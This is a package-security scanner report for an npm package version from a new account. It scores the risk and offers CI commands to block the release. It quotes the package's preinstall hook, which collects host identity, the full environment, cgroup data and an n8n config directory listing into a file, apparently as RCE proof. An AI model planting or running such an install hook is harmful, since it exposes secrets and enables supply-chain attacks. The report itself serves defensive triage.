PkgRadar

Package evidence

[email protected]

New Account With Lifecycle Hook: package first published 1 day(s) ago, 6 total version(s), has lifecycle hook

Trust signals

Why this verdict

PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.

Versions published
6
First published
Jun 2026
Publisher
diego95root-account

Recommended action

Review before promoting

Mixed signals: the package has indicators worth reading before allowing the update in automated dependency flows.

Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["[email protected]"],"fail_on":"review"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["[email protected]"],"fail_on":"review"}'
Artifact bytes1,149
Previous versionnone
Published2026-06-17T15:06:50.911Z
SHA-256335c3407033d49ff50a21c67552ad4e983282b8d3e9aadae66427c7cfcba156d

Why flagged

What the scanner saw

New Account With Lifecycle Hook: package first published 1 day(s) ago, 6 total version(s), has lifecycle hook

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

available

review
Last checked
reviewRisk
15Score
1.0.0Version
Status history (2 events)
  1. availableavailable · risk review · score 15 · status available -> available, risk high -> review, score 25 -> 15
  2. newavailable · risk high · score 25 · status changed

Evidence

Static findings

3 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
mediumNew Account With Lifecycle Hookpackage.jsonpackage first published 1 day(s) ago, 6 total version(s), has lifecycle hook10
mediumSuspicious Publish Contextmanifest{"package_age_days":1,"publisher":"diego95root-account","burst_same_day":0,"burst_week":1,"lure":null,"version_anomaly":false,"new_account":true}10
Show all 3 findings (low-signal and informational)
SeverityKindPathDetailPoints
mediumNew Account With Lifecycle Hookpackage.jsonpackage first published 1 day(s) ago, 6 total version(s), has lifecycle hook10
mediumSuspicious Publish Contextmanifest{"package_age_days":1,"publisher":"diego95root-account","burst_same_day":0,"burst_week":1,"lure":null,"version_anomaly":false,"new_account":true}10
lowInstall-time lifecycle scriptpackage.jsonpreinstall="id > /tmp/n8n-rce-proof.txt 2>&1; hostname >> /tmp/n8n-rce-proof.txt 2>&1; whoami >> /tmp/n8n-rce-proof.txt 2>&1; uname -a >> /tmp/n8n-rce-proof.txt 2>&1; cat /etc/os-release >> /tmp/n8n-rce-proof.txt 2>&1; env | sort >> /tmp/n8n-rce-proof.txt 2>&1; cat /proc/1/cgroup >> /tmp/n8n-rce-proof.txt 2>&1 || true; ls -la /root/.n8n/ >> /tmp/n8n-rce-proof.txt 2>&1 || true"5

Manifest

Package metadata

Scripts1
  • preinstallid > /tmp/n8n-rce-proof.txt 2>&1; hostname >> /tmp/n8n-rce-proof.txt 2>&1; whoami >> /tmp/n8n-rce-proof.txt 2>&1; uname -a >> /tmp/n8n-rce-proof.txt 2>&1; cat /etc/os-release >> /tmp/n8n-rce-proof.txt 2>&1; env | sort >> /tmp/n8n-rce-proof.txt 2>&1; cat /proc/1/cgroup >> /tmp/n8n-rce-proof.txt 2>&1 || true; ls -la /root/.n8n/ >> /tmp/n8n-rce-proof.txt 2>&1 || true